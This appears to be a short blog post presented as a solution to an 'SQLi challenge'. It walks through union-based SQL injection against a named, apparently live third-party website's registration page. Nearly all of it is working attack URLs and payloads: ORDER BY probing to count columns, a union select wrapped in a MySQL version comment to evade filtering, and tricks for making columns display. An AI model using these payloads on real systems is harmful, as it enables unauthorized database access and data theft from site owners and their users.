SQLi-3 Solution
- Get link
- X
- Other Apps
solution for {SQLi CHALLENGE }
.
the link to test
.
http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184
.
first let's get column count
.
manifestation_id=184 order by 7 -- - error
.
manifestation_id=184 order by 6 -- - no error column count is 6
.
http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,5,6 -- -
.
now there no Vulnerable Columns On Page
.
I think you will now make all column null or search in source page
.
but not all column need to be false , some column need to be true to fix like 1,1,1-- -
.
http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,1,1,1,1,1 -- -
.
work good
.
column 5 need to fix by make it true
.
http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,1,6 -- -
.
and as ' false ' I can add ' true ' to column to fix it like
.
1,2,3,4,true,6-- -
.
so when you try to fix columns just try this method first
.
false
.
union select 0,0,0,0-- -
.
true
.
union select 1,1,1,1-- -
.
Done
- Get link
- X
- Other Apps
Comments
Post a Comment